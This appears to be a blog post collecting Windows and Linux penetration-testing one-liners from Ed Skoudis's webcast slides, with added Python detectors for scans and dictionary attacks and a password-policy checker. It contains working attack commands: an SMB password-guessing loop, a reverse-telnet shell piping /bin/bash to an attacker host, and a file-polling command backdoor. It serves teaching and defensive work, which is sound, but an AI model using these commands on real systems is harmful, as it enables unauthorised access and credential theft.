I’m now providing an updated Linux Penetration Testing Laptop Setup document to help install popular and useful vulnerability assessment tools on the Linux operating system. You can simply download BackTrack, but I feel you will gain a better understanding of the tools, and of Linux in general, if you install the tools yourself; you will also have the most current version of each tool. See Configuration Tutorials for the latest document.
Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans). I highly recommend listening to these webcasts and downloading the slides for your reference. Below are the commands extracted from the slides that can be very useful during a penetration test.
Ninjitsu I
Ping Sweep
C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)
Ninjitsu II
Linux Command-Line Port Scanner
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
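The ping sweep and dictionary attack from Ninjitsu I and the two port scanners above all leave the same footprint in logs: one source touching many distinct values (hosts, ports or account names) in a short time. The following detector is an added example written for this post, not code from the webcast slides; it is in Python rather than batch so it can run wherever the log export lands. The log line format (an ISO timestamp followed by key=value tokens, modelled on iptables and Windows event 4625 fields), the sample data and the thresholds are all constructed assumptions.

```python
"""Sliding-window fan-out detector for sweep, scan and dictionary-attack
patterns.  Added example; the log format, data and thresholds are assumed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)
PORT_FANOUT = 20   # distinct destination ports from one source within WINDOW
USER_FANOUT = 5    # distinct account names failing from one source within WINDOW


def fanout_alerts(events, key_field, value_field, threshold, window=WINDOW):
    """Return the sorted keys (e.g. source IPs) that reach `threshold` distinct
    values (ports, usernames) inside any `window`-long interval.
    `events` are dicts with a datetime under 'ts'; order does not matter."""
    by_key = defaultdict(list)
    for e in events:
        by_key[e[key_field]].append((e["ts"], e[value_field]))
    alerts = []
    for key, items in by_key.items():
        items.sort()
        recent = deque()             # (ts, value) pairs inside the window
        counts = defaultdict(int)    # distinct value -> occurrences in window
        for ts, val in items:
            recent.append((ts, val))
            counts[val] += 1
            while recent and ts - recent[0][0] > window:   # expire old events
                _, old = recent.popleft()
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
            if len(counts) >= threshold:
                alerts.append(key)
                break
    return sorted(alerts)


def parse_kv_line(line):
    """Parse '<ISO timestamp> k=v k=v ...' (constructed format) into a dict."""
    ts, _, rest = line.partition(" ")
    rec = {"ts": datetime.fromisoformat(ts)}
    for tok in rest.split():
        k, sep, v = tok.partition("=")
        if sep:
            rec[k] = v
    return rec


def constructed_firewall_log():
    """Constructed iptables-style lines: one host walking ports 1-30, one host
    doing ordinary web traffic on just two ports."""
    base = datetime(2024, 1, 10, 12, 0, 0)
    lines = []
    for port in range(1, 31):
        t = base + timedelta(seconds=port)
        lines.append(f"{t.isoformat()} SRC=10.10.10.5 DST=10.10.10.10 PROTO=TCP DPT={port}")
    for i in range(40):
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} SRC=10.10.10.7 DST=10.10.10.10 PROTO=TCP DPT={80 if i % 2 else 443}")
    return lines


def constructed_security_log():
    """Constructed lines shaped like Windows failed-logon (4625) events: one
    source cycling through many account names, one user mistyping twice."""
    base = datetime(2024, 1, 10, 12, 5, 0)
    lines = []
    for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi"]):
        t = base + timedelta(seconds=i)
        lines.append(f"{t.isoformat()} EventID=4625 TargetUserName={user} IpAddress=10.10.10.5 LogonType=3")
    for i in range(2):
        t = base + timedelta(seconds=30 + i)
        lines.append(f"{t.isoformat()} EventID=4625 TargetUserName=bob IpAddress=10.10.10.8 LogonType=3")
    lines.append(f"{(base + timedelta(seconds=40)).isoformat()} EventID=4624 TargetUserName=bob IpAddress=10.10.10.8 LogonType=3")
    return lines


def port_scan_sources(lines):
    """Sources that hit PORT_FANOUT distinct destination ports within WINDOW."""
    events = [e for e in map(parse_kv_line, lines) if "DPT" in e]
    return fanout_alerts(events, "SRC", "DPT", PORT_FANOUT)


def dictionary_attack_sources(lines):
    """Sources with failed logons (4625) for USER_FANOUT distinct users within WINDOW."""
    events = [e for e in map(parse_kv_line, lines) if e.get("EventID") == "4625"]
    return fanout_alerts(events, "IpAddress", "TargetUserName", USER_FANOUT)


if __name__ == "__main__":
    print("port-scan sources:", port_scan_sources(constructed_firewall_log()))
    print("dictionary-attack sources:", dictionary_attack_sources(constructed_security_log()))
```

The same `fanout_alerts` primitive serves both cases because only the grouping key and the counted value differ; the benign hosts in the constructed data generate more events than the attacker but touch only one or two distinct values, which is why distinct-count rather than raw volume is the right signal.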
Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]
Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Ninjitsu III
Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface "wireless network connection" disable & ping -n 3 127.0.0.1 >nul & netsh interface set interface "wireless network connection" enable & ping -n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)
Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"
Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"
Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI
List Domain Password Settings
C:\> net accounts /domain
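The `net accounts /domain` output is what decides whether the Ninjitsu I dictionary attack is practical: with lockout set to Never, every guess is free. As an added example (not from the slides), here is a small parser for that output plus a baseline check. The sample text is constructed to match the layout `net accounts` prints, and the baseline numbers are assumptions to replace with the local policy.

```python
"""Parse `net accounts /domain` output and flag settings outside a baseline.
Added example; the sample output is constructed and the baseline is assumed."""

# Constructed sample modelled on the layout `net accounts` prints (assumption).
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""

# Assumed baseline: ("min", n) means the value must be at least n,
# ("max", n) means at most n.  Adjust to the domain's own policy.
BASELINE = {
    "Minimum password length": ("min", 12),
    "Length of password history maintained": ("min", 24),
    "Maximum password age (days)": ("max", 90),
    "Lockout threshold": ("max", 10),
    "Lockout duration (minutes)": ("min", 15),
    "Lockout observation window (minutes)": ("min", 15),
}


def parse_net_accounts(text):
    """Return {setting: value}; numbers become int, 'Never'/'Unlimited' become
    None so callers can treat the control as switched off."""
    settings = {}
    for line in text.splitlines():
        if ":" not in line or line.startswith("The command"):
            continue
        key, _, raw = line.partition(":")
        raw = raw.strip()
        if raw.isdigit():
            val = int(raw)
        elif raw.lower() in ("never", "unlimited"):
            val = None
        else:
            val = raw
        settings[key.strip()] = val
    return settings


def check_baseline(settings, baseline=BASELINE):
    """Return (setting, value, reason) for every baseline violation."""
    findings = []
    for name, (kind, limit) in baseline.items():
        val = settings.get(name)
        if val is None:
            # Never/Unlimited or absent: the control is off or unverifiable.
            findings.append((name, val, f"not set (limit {kind} {limit})"))
        elif kind == "min" and val < limit:
            findings.append((name, val, f"below minimum {limit}"))
        elif kind == "max" and val > limit:
            findings.append((name, val, f"above maximum {limit}"))
    return findings


def assess(text):
    """Parse raw `net accounts` output and return the baseline findings."""
    return check_baseline(parse_net_accounts(text))


if __name__ == "__main__":
    for name, val, reason in assess(SAMPLE_NET_ACCOUNTS):
        print(f"FINDING: {name} = {val}: {reason}")
```

Against the constructed sample this reports the 7-character minimum length and the disabled lockout threshold; feed it real output with `net accounts /domain > accounts.txt` and `assess(open("accounts.txt").read())`.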